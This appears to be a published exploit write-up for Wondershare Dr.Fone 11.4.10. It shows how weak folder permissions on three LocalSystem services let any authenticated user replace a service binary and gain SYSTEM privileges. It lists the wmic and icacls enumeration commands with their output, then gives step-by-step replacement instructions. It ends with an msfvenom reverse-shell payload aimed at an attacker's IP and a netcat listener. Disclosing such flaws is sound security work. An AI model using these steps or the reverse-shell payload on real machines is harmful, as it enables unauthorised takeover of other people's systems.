Wondershare Dr.Fone 11.4.10 - Insecure File Permissions









# Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
# Date: 04/25/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://drfone.wondershare.com/
# Software Link: https://download.wondershare.com/drfone_full3360.exe
# Version: 11.4.10
# Tested on: Windows 10 64-bit

 # Note: The application folder "Wondershare Dr.Fone" may be different (e.g it will be "drfone" if we download the installer from the italian website)

 # Description:
 The application "Wondershare Dr. Fone" comes with 3 services: 
 1. DFWSIDService
 2. ElevationService
 3. Wondershare InstallAssist

 All the folders that contain the binaries for the services have weak permissions.
 These weak permissions allow any authenticated user to get SYSTEM privileges.

 First, we need to check if services are running using the following command:
 wmic service get name,displayname,pathname,startmode,startname,state | findstr /I wondershare

 Wondershare WSID help                     DFWSIDService               C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe                          Auto 	LocalSystem	Running  
 Wondershare Driver Install Service help   ElevationService            C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps\ElevationService.exe	Auto 	LocalSystem     Running  
 Wondershare Install Assist Service        Wondershare InstallAssist	C:\ProgramData\Wondershare\Service\InstallAssistService.exe                                     Auto 	LocalSystem     Running  

 Now we need to check if we have enough privileges to replace the binaries:

 icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone"
 Everyone:(OI)(CI)(F) <= the first row tells us that Everyone has Full Access (F) on files (OI = Object Inherit) and folders (CI = Container Inherit)

 icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps"
 Everyone:(I)(OI)(CI)(F) <= same here

 icacls "C:\ProgramData\Wondershare\Service"
 Everyone:(I)(OI)(CI)(F) <= and here

# Proof of Concept:
1. Create an exe file with the name of the binary we want to replace  (e.g. WsidService.exe if we want to exploit the service "Wondershare WSID help") 
2. Put it in the folder (e.g. C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\)
3. After replacing the binary, wait the next reboot (unless the service can be restarted manually)

As a proof of concept we can generate a simple reverse shell using msfvenom, and use netcat as the listener:
simple payload: msfvenom --payload windows/shell_reverse_tcp LHOST=<YOUR_IP_ADDRESS> LPORT=<YOUR_PORT> -f exe > WsidService.exe
listener: nc -nlvp <YOUR_PORT>